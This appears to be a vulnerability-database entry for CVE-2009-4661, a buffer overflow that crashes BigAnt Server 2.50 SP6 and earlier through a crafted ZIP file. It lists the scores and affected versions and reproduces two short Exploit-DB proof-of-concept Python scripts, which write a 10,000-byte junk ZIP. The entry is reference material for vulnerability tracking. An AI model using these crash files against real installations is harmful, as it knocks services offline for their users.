CVE-2009-4661
published 2010-03-03CVE-2009-4661: Multiple buffer overflows in BigAnt Server 2.50 SP6 and earlier allow user-assisted remote attackers to cause a denial of service (application crash) via a…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
2.11%
79.5th percentile
Multiple buffer overflows in BigAnt Server 2.50 SP6 and earlier allow user-assisted remote attackers to cause a denial of service (application crash) via a crafted ZIP file that is not properly handled when the victim uses the (1) Update or (2) Plug-In console menu item.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bigantsoft | bigant_server | <= 2.50 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)
exploitdb·2009-09-21
CVE-2009-4661 BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)
BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)
---
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-21]
Exploit-DB
BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)
exploitdb·2009-09-16
CVE-2009-4661 BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)
BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)
---
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]
No writeups or analysis indexed.
2010-03-03
Published